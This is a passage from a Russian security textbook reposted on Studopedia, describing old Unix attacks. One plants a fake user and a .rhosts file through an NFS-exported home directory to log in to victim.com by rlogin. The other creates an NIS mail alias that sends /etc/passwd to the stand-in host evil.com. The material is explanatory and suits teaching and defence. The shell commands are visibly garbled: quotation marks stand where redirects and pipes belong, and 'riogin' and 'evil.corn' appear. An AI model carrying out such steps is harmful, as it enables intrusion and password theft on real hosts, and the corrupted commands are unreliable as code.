Студопедия.Орг Главная | Случайная страница | Контакты | Мы поможем в написании вашей работы!  
 

Drwxr-xr-x 7 root wheel 512 Jul 19 1991



1 drwx--x--x 9 10001 daemon 1024 Aug 315:49 guest

evil # echo guest: х: 10001:1: временно для взлома:/: " /etc/passwd

evil # su guest

evil % echo victim.com " guest/, rhosts

evil % riogin victim.com

Welcome to victim.com!

victim %

Если бы victim.com нe экспортировал домашние каталоги пользователей, а

только каталоги с программами (скажем, /usr или /usr/local/bin), можно

было бы заменить команду "троянским" конем, который выполнял бы те же

Операции.

Распространенность NFS приводит к тому, что подобные атаки до сих пор

Являются актуальными, и, как мы увидим, они похожи на уязвимости,

Имеющиеся в Windows NT из-за наличия в ней механизма разделения каталогов.

Использование службы NIS

Активный NIS-сервер управляет почтовыми псевдонимами (aliases) для доменов

NIS. Подобно рассмотренным вариантам атак с помощью псевдонимов локальной

Почты можно было создавать почтовые псевдонимы, которые бы выполняли

Команды, когда им приходит почта. Например, рассмотрим создание псевдонима

"foo", посылавшего по почте файл паролей на evil.corn, когда на его адрес

поступало любое сообщение:

nis-master # echo 'foo: "I mail [email protected] " /etc/passwd "' "

/etc/aliases

nis-master и cd /var/yp

nis-master # make aliases

nis-master # echo test I mail -v [email protected]





Дата публикования: 2014-11-04; Прочитано: 484 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!



studopedia.org - Студопедия.Орг - 2014-2024 год. Студопедия не является автором материалов, которые размещены. Но предоставляет возможность бесплатного использования (0.007 с)...